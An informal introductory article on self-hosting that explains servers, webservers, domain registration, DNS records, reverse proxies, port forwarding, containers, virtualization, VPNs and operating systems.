One of the easiest things to self-host with the lowest barrier to entry is a website. For the most basic website of your own, all you need is a domain name and a webserver. Then you throw a few lines of HTML in a file and you have yourself a "website". With a service like Let's Encrypt, securing the site with a SSL certificate is easy too.

A lot of different services that you can self-host are "websites". There are dynamic sites with robust content management systems like Joomla!, Drupal, WordPress, or b2evolution. There are forums like phpBB, MyBB, vBulletin, Discourse, etc. Knowledge bases like DokuWiki, MediaWiki, BookStack, or Gollum are also websites. These websites only require a webserver, an interpreter (PHP), and a database (SQLite, PostgreSQL, MySQL).

Just about everything these days has a web UI or frontend to make things easier. HTTP/HTML/JS are well-understood standards that are ubiquitous. There are many libraries for converting or presenting your content in a web-friendly way for almost all programming languages you can learn.

It can be hard for someone unfamiliar to find the difference between the "website" frontend and the content backend. Sometimes the difference is almost non-existent. Sometimes there are many layers and systems working behind the scenes to make it happen.

It may be better to say that everything can be "accessed" through a website, even if it isn't one per-se. And if it can't, there's probably a separate piece of software that makes a web UI for it.

Examples of services with a web UI or separate web-based frontends are: BitTorrent clients like qBittorrent/Transmission, media streaming servers like Jellyfin/Navidrome, file synchronization services like Nextcloud/ownCloud/Seafile, communication services like Synapse/InspIRCd/jabberd/Mumble, and many more.

Other services use the server-client model where the entire package is in two parts. The server part that runs at all time to serve content and the client part that connects to have content served to it. Examples are: game servers like Rust/Minecraft/Factorio, FTP servers, email servers, and more.

Informatique

Common Terms and Concepts of Selfhosting

Servers

Servers are machines whose purpose is to provide a service or content over a network. They are typically administered remotely and only connect physically to power and a network. They "serve" content or services using software daemons. Bare metal servers are not virtualized. Any service or content they offer is configured on the host system. They are not new per-se, but with the introduction of containerization and virtualization, the phrase has been coined to differentiate the old-school server tradition from newer techniques. Their natural habitat is the datacenter, where they live in racks to survive off electricity and network data. While they are not able to reproduce, they have no natural predators, so their population is stable. Some breeds of server can be found in network/data closets where they live in a business. Fewer are still kept in captivity in private homes. Virtual servers are servers that are run under an emulator or hypervisor to provide a server-like environment using a software envelope which may be augmented with hardware support.

Daemons

Daemons are software packages that run perpetually to provide content or a service. They differentiate servers from clients. Examples of daemons are webservers, email servers, file servers, authentication services (AD, LDAP), database servers, and many more.

Webservers

Webservers are daemons that accept HTTP requests and serve set content based on the requested host (IP address or domain name). The content can be static HTML/XML or it can be dynamic (JavaScript, PHP, FCGI, WSGI). Webservers commonly offer reverse proxy functionality, it is common to use webservers for this purpose instead. Common webservers include: Apache, Cherokee, LiteSpeed, Lighttpd, nginx, and IIS. Apache and nginx are the top webservers by market share respectively, with IIS coming in third.

Domain Names

Domain names are a word, phrase, or string that is used for navigating the Internet. They are registered to individuals or legal entities in lengths of years for a set fee. They are divided into levels, where each level is separated by a period (dot). Domain registrations include the top-level and second-level portion of a domain. All levels below are controlled by DNS at the discretion of the domain registrant. Top-level domains (TLDs) are .com, .net, .info, .edu, .org, etc. The customizable part of the domain name you can register is called the second-level domain. Third-level domains are referred to as subdomains.

Structure: subdomain.secondleveldomain.tld

E.g.: fr.vainsta.fr

Domain Registration

Registering a domain name is done with a Domain Registrar. Prices are based on the top-level domain, but all registrations are for a period of one year minimum. Registrars come in two flavors:

Accreditation requires quite a bit of infrastructure and vetting to make sure you can handle all aspects of registering and maintaining domains on behalf of the registrant. Resellers are popular because of low overhead and easy implementation. Many "white label" registrars have turnkey solutions for resellers to appear as independent registrars while actually reselling domain names.

Which Is Right For You?

Choosing a domain registrar is easy. Picking a domain registrar that is trustworthy and reputable is less so. Many domain registrars also offer to handle the DNS records for the domains registered with them. Many registrars have domain registration as a part of their business. Registration is usually bundled with webhosting or other related services. You may even get a domain registration for free if you agree to a year-long hosting contract with a webhost. While bundling related services together under one roof may sound convenient, it is generally not a good idea. It is recommended to have your domain registration with a registrar, DNS records with another company, and hosting with yet another entity. Common reasoning for this piece of advice is that if your service provider has a serious outage or other technical problem, it can only affect one aspect of your online presence. If you have all services under one provider, a technical issue could prevent your DNS from resolving and your website/service from being served.

You can find the list of ICANN-accredited domain registrars here.

As far as finding a reputable, trustworthy service provider, we must insist on your own research. One of the most popular forums for discussing hosting and related services is Web Hosting Talk. If a relevant service provider has a bad reputation in the industry, you can surely find out about it here.

Domain Name System

The Domain Name System (DNS) is the method of defining what unique machines serve content for your domain. The important parts of DNS you have to worry about are nameservers and DNS records.

Nameservers

Nameservers are a way to declare which servers are responsible for answering record requests for your domain. Most registrars provide DNS services, but if you have your DNS provided elsewhere, you will want to provide your primary and secondary nameservers to your registrar. The nameservers to use will be provided by your DNS service provider.

E.g.: ns1.dnsnameserver.net, ns2.dnsnameserver.net

DNS Records

DNS records are part of your domain name configuration called a DNS zone.

Example SOA:

$TTL 86400
@   IN  SOA     ns1.nameserver.com. postmaster.sumdomain.com. (
    2020080302  ;Serial
    7200        ;Refresh
    3600        ;Retry
    1209600     ;Expire
    3600        ;Negative response caching TTL
)

The fields of a DNS zone record are:

There are many types of DNS records, let's go over some common ones. This list is not exhaustive.


Domain Time To Live Class Type Content
example.com. 86400 IN A 192.168.1.240
ipv6.example.com. 86400 IN AAAA feef:00bb:2005:1eef:fbca:544d
www.example.com. 86400 IN CNAME example.com.
example.com. 86400 IN MX 10 mail.mailserver.com
example.com. 86400 IN TXT "Reserved for a purpose I am not legally required to disclose."

Reverse Proxies

Reverse proxies are daemons that accept connections and then connect to another service based on port or host to facilitate the request. They act as a middleman instead of a traffic redirector.

Typical use cases for reverse proxies are to provide a unified frontend for multiple backends or hosts. Another common use is for high-availability to provide failover or distribute load between multiple backends serving the same content.

Port Forwarding

Port forwarding is the function of inspecting traffic on an incoming port and redirecting it to another port or host with minimal modification. Primary purposes of this are to forward traffic to a service behind a firewall/router.

Common for hosting game servers from home when running dedicated servers before developers moved to match-making. Another use for this is to open ports for BitTorrent so that you can share your vast and innumerable collection of Linux ISOs.

The difference between port forwarding and a reverse proxy is that the reverse proxy will accept, process, and establish a new connection to the backend service to fulfil the request.

Port forwarding inspects and alters packet headers before it is routed to its new destination. The connection is otherwise untouched.

Port forwarding is a function of your firewall. Commonly at the router or other network gateway.

Linux has two firewalls called iptables and nftables, with many frontends or management packages available for them. BSD-based firewalls are pf, ipfw, and IPFilter. The Windows firewall consists of a scarecrow holding a sign saying: "plz no tresspass".

Containers

Containers are software envelopes to isolate a piece or bundle of software and their dependencies. Containers come in many forms. A container could contain a PHP-based forum with an AMP stack (Apache, Maria DB, PHP) as dependencies. This is useful if you want an easy way to deploy software without configuring dependent software/libraries manually. Containers can also resolve software conflicts when running multiple services which depend on different versions of the same software/libraries.

Virtualization

Virtualization is a lower level form of containerization. There are many forms of virtualization that provide different sets of features/tradeoffs. In practice, it often virtualizes whole or major parts of an operating system.

Full virtualization

Full virtualization is generally understood as the containerization of a full, unmodified operating system with virtualized hardware. The virtualized OS is not host-aware. Fully virtualized guests require more overhead than paravirtualized guests. This can be mitigated with hardware support (Intel VT, AMD SVM) for virtualization instructions.

Examples of this are Hyper-V, Xen, KVM/Qemu, VMware ESXi.

Paravirtualization

Paravirtualization is the practice of running a modified kernel/OS where privileged instructions are sent through an API shared with the host. It does not require the virtualization of hardware, but it does require an operating system that is modified to be used with the specific API used by your chosen virtualization method. This can be in the form of source code modifications or specialized device drivers.

Microsoft Windows cannot be paravirtualized.

Examples: Xen, Oracle VM, OpenVZ.

Virtual private networks

Virtual private networks (VPNs) are a way of networking individual machines together in software regardless of their physical or network proximity. A typical use case is for networking corporate locations together to share network resources such as file shares, intranet webservers, on-premises services, etc. Another use for a VPN is to tunnel traffic destined for a public service through to another endpoint, usually to bypass geo-location restrictions or state-imposed censorship of the Internet.

Some people use VPNs so they can access their services that are behind a restrictive ISP or firewall.

Operating Systems

An operating system is the software that is responsible for running and managing your physical machine. It provides the kernel, hardware drivers, low-level software packages, libraries, and userland applications for the end-user to provide basic functions.

Most consumers or end-users will use Microsoft Windows or macOS as their operating system on their desktop or laptop computers.

You will commonly find that corporate IT infrastructure used to serve employees is Microsoft-based, using ActiveDomain (AD) for authentication, Exchange for email and groupware, IIS for serving websites, and MSSQL for databases.

Linux or UNIX-based operating systems are the popular choice for hosting services and serving content to end-users. Examples are webhosts for serving websites, Netflix for serving movie and TV streams, DNS services for domain records, and most if not all other infrastructure needed to keep the Internet operational.

Android is a Linux-based operating system used in the majority of the smartphone market. iOS is a BSD-based mobile OS used by Apple for iPhones.

Embedded Linux and BSD are also used in devices like set-top boxes, smart TVs, routers, smart switches, medical equipment, flight telemetry controllers for aerospace, navigation equipment, industrial automation, etc...